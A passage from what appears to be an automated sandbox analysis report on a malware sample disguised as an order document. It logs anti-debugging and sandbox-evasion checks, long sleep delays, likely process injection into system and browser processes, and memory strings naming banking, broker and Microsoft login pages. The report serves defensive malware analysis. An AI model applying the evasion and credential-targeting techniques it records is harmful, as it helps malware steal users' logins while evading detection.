                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: 4550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: 8870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: 72A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: 9870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeMemory allocated: A870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105096E rdtsc 5_2_0105096E
                Source: C:\Users\user\Desktop\ORDER - 401.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeWindow / User API: threadDelayed 3289Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeWindow / User API: threadDelayed 6683Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\ORDER - 401.exe TID: 2076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988Thread sleep count: 3289 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988Thread sleep time: -6578000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988Thread sleep count: 6683 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988Thread sleep time: -13366000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe TID: 3180Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe TID: 3180Thread sleep time: -55500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe TID: 3180Thread sleep time: -37000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001BCC50 FindFirstFileW,FindNextFileW,FindClose,8_2_001BCC50
                Source: C:\Users\user\Desktop\ORDER - 401.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 086604I_P.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 086604I_P.8.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 086604I_P.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4676883996.000000000133F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 086604I_P.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 086604I_P.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 086604I_P.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 086604I_P.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 086604I_P.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 0000000B.00000002.2768693148.000002D3B892C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 086604I_P.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 086604I_P.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 086604I_P.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 086604I_P.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 086604I_P.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 086604I_P.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 086604I_P.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ieUnatt.exe, 00000008.00000002.4676389465.000000000260A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5%
                Source: 086604I_P.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 086604I_P.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 086604I_P.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 086604I_P.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0105096E rdtsc 5_2_0105096E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_00417D83 LdrLoadDll,5_2_00417D83
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]5_2_010BE10E
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BA118 mov ecx, dword ptr fs:[00000030h]5_2_010BA118
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]5_2_010BA118
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]5_2_010BA118
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]5_2_010BA118
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D0115 mov eax, dword ptr fs:[00000030h]5_2_010D0115
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01040124 mov eax, dword ptr fs:[00000030h]5_2_01040124
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]5_2_010A4144
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]5_2_010A4144
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A4144 mov ecx, dword ptr fs:[00000030h]5_2_010A4144
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]5_2_010A4144
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]5_2_010A4144
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A8158 mov eax, dword ptr fs:[00000030h]5_2_010A8158
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016154 mov eax, dword ptr fs:[00000030h]5_2_01016154
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016154 mov eax, dword ptr fs:[00000030h]5_2_01016154
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100C156 mov eax, dword ptr fs:[00000030h]5_2_0100C156
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01050185 mov eax, dword ptr fs:[00000030h]5_2_01050185
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CC188 mov eax, dword ptr fs:[00000030h]5_2_010CC188
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CC188 mov eax, dword ptr fs:[00000030h]5_2_010CC188
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B4180 mov eax, dword ptr fs:[00000030h]5_2_010B4180
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B4180 mov eax, dword ptr fs:[00000030h]5_2_010B4180
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]5_2_0109019F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]5_2_0109019F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]5_2_0109019F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]5_2_0109019F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100A197 mov eax, dword ptr fs:[00000030h]5_2_0100A197
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100A197 mov eax, dword ptr fs:[00000030h]5_2_0100A197
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100A197 mov eax, dword ptr fs:[00000030h]5_2_0100A197
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D61C3 mov eax, dword ptr fs:[00000030h]5_2_010D61C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D61C3 mov eax, dword ptr fs:[00000030h]5_2_010D61C3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]5_2_0108E1D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]5_2_0108E1D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0108E1D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]5_2_0108E1D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]5_2_0108E1D0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010E61E5 mov eax, dword ptr fs:[00000030h]5_2_010E61E5
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010401F8 mov eax, dword ptr fs:[00000030h]5_2_010401F8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01094000 mov ecx, dword ptr fs:[00000030h]5_2_01094000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]5_2_0102E016
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]5_2_0102E016
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]5_2_0102E016
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]5_2_0102E016
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100A020 mov eax, dword ptr fs:[00000030h]5_2_0100A020
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100C020 mov eax, dword ptr fs:[00000030h]5_2_0100C020
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A6030 mov eax, dword ptr fs:[00000030h]5_2_010A6030
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01012050 mov eax, dword ptr fs:[00000030h]5_2_01012050
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01096050 mov eax, dword ptr fs:[00000030h]5_2_01096050
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103C073 mov eax, dword ptr fs:[00000030h]5_2_0103C073
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101208A mov eax, dword ptr fs:[00000030h]5_2_0101208A
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A80A8 mov eax, dword ptr fs:[00000030h]5_2_010A80A8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D60B8 mov eax, dword ptr fs:[00000030h]5_2_010D60B8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D60B8 mov ecx, dword ptr fs:[00000030h]5_2_010D60B8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010920DE mov eax, dword ptr fs:[00000030h]5_2_010920DE
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0100A0E3
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010180E9 mov eax, dword ptr fs:[00000030h]5_2_010180E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010960E0 mov eax, dword ptr fs:[00000030h]5_2_010960E0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100C0F0 mov eax, dword ptr fs:[00000030h]5_2_0100C0F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010520F0 mov ecx, dword ptr fs:[00000030h]5_2_010520F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A30B mov eax, dword ptr fs:[00000030h]5_2_0104A30B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A30B mov eax, dword ptr fs:[00000030h]5_2_0104A30B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104A30B mov eax, dword ptr fs:[00000030h]5_2_0104A30B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100C310 mov ecx, dword ptr fs:[00000030h]5_2_0100C310
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01030310 mov ecx, dword ptr fs:[00000030h]5_2_01030310
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]5_2_01092349
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]5_2_0109035C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]5_2_0109035C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]5_2_0109035C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109035C mov ecx, dword ptr fs:[00000030h]5_2_0109035C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]5_2_0109035C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]5_2_0109035C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B8350 mov ecx, dword ptr fs:[00000030h]5_2_010B8350
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010DA352 mov eax, dword ptr fs:[00000030h]5_2_010DA352
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B437C mov eax, dword ptr fs:[00000030h]5_2_010B437C
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100E388 mov eax, dword ptr fs:[00000030h]5_2_0100E388
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100E388 mov eax, dword ptr fs:[00000030h]5_2_0100E388
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100E388 mov eax, dword ptr fs:[00000030h]5_2_0100E388
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103438F mov eax, dword ptr fs:[00000030h]5_2_0103438F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0103438F mov eax, dword ptr fs:[00000030h]5_2_0103438F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01008397 mov eax, dword ptr fs:[00000030h]5_2_01008397
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01008397 mov eax, dword ptr fs:[00000030h]5_2_01008397
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01008397 mov eax, dword ptr fs:[00000030h]5_2_01008397
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CC3CD mov eax, dword ptr fs:[00000030h]5_2_010CC3CD
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]5_2_0101A3C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]5_2_0101A3C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]5_2_0101A3C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]5_2_0101A3C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]5_2_0101A3C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]5_2_0101A3C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]5_2_010183C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]5_2_010183C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]5_2_010183C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]5_2_010183C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010963C0 mov eax, dword ptr fs:[00000030h]5_2_010963C0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE3DB mov eax, dword ptr fs:[00000030h]5_2_010BE3DB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE3DB mov eax, dword ptr fs:[00000030h]5_2_010BE3DB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE3DB mov ecx, dword ptr fs:[00000030h]5_2_010BE3DB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BE3DB mov eax, dword ptr fs:[00000030h]5_2_010BE3DB
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B43D4 mov eax, dword ptr fs:[00000030h]5_2_010B43D4
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010B43D4 mov eax, dword ptr fs:[00000030h]5_2_010B43D4
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010203E9 mov eax, dword ptr fs:[00000030h]5_2_010203E9
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E3F0 mov eax, dword ptr fs:[00000030h]5_2_0102E3F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E3F0 mov eax, dword ptr fs:[00000030h]5_2_0102E3F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102E3F0 mov eax, dword ptr fs:[00000030h]5_2_0102E3F0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010463FF mov eax, dword ptr fs:[00000030h]5_2_010463FF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100823B mov eax, dword ptr fs:[00000030h]5_2_0100823B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01098243 mov eax, dword ptr fs:[00000030h]5_2_01098243
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01098243 mov ecx, dword ptr fs:[00000030h]5_2_01098243
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100A250 mov eax, dword ptr fs:[00000030h]5_2_0100A250
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01016259 mov eax, dword ptr fs:[00000030h]5_2_01016259
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CA250 mov eax, dword ptr fs:[00000030h]5_2_010CA250
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010CA250 mov eax, dword ptr fs:[00000030h]5_2_010CA250
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014260 mov eax, dword ptr fs:[00000030h]5_2_01014260
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014260 mov eax, dword ptr fs:[00000030h]5_2_01014260
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01014260 mov eax, dword ptr fs:[00000030h]5_2_01014260
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0100826B mov eax, dword ptr fs:[00000030h]5_2_0100826B
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E284 mov eax, dword ptr fs:[00000030h]5_2_0104E284
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0104E284 mov eax, dword ptr fs:[00000030h]5_2_0104E284
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01090283 mov eax, dword ptr fs:[00000030h]5_2_01090283
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01090283 mov eax, dword ptr fs:[00000030h]5_2_01090283
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01090283 mov eax, dword ptr fs:[00000030h]5_2_01090283
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010202A0 mov eax, dword ptr fs:[00000030h]5_2_010202A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010202A0 mov eax, dword ptr fs:[00000030h]5_2_010202A0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010A62A0 mov eax, dword ptr fs:[00000030h]5_2_010A62A0
